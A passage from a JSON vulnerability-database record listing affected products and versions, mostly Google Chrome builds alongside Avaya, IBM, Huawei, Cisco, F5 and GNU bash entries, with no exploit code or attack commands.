"scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.26" }, { "model": "aura communication manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "elog v200r003c10spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch121 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.436.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.21" }, { "model": "totalstorage san16b-2 fabric switch 2005-b16", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1030.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.45" }, { "model": "move", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.2" }, { "model": "uma v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "aura communication manager ssp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.679.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.38" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.644.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.70" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "associates customer experience manager transaction impact monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.17" }, { "model": "totalstorage san256b director model m48 2109-m48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.81" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.313.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.351.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.10" }, { "model": "gaia os r76.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ipso r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.887.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.1" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.36" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.793.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.1" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.71" }, { "model": "system storage san24b-4 2498-b24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1043.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1000.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.317" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.909.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.14" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.318" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.488.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.526.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.56" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0.3" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.808.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.287.0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.584.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1042.0" }, { "model": "bash rc1", "scope": "eq", "trust": 0.3, "vendor": "gnu", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.33" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.907.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.120" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7232" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.29" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.25" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.81" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.823.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.791.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.577.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "oceanstor s5800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.91" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.676.0" }, { "model": "virtual library system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.525.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.10" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.681.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.309" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.97" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.214" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "oceanstor s6900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1050" }, { "model": "storeonce gen backup software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "22.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.135" }, { "model": "oceanstor css v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.11" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.950.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.78" }, { "model": "secureplatform r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.613.0" }, { "model": "espace meeting v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.32" }, { "model": "system networking san96b-5 2498-n96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.182.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.163" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.304" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.162" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77650" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.305" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.0" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.464.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.682.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.15" }, { "model": "protectier enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.940.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.5" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "oceanstor css v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.22" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1683.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.48" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.376.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.50" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1025" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.921.3" }, { "model": "oceanstor uds v100r002c00lvdf0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.17" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.10" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.538.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.519.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1041.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.69" }, { "model": "high-density server dh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.561.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.586.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.93" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "storeever esl g3 tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.766.0" }, { "model": "element management system", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.740.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 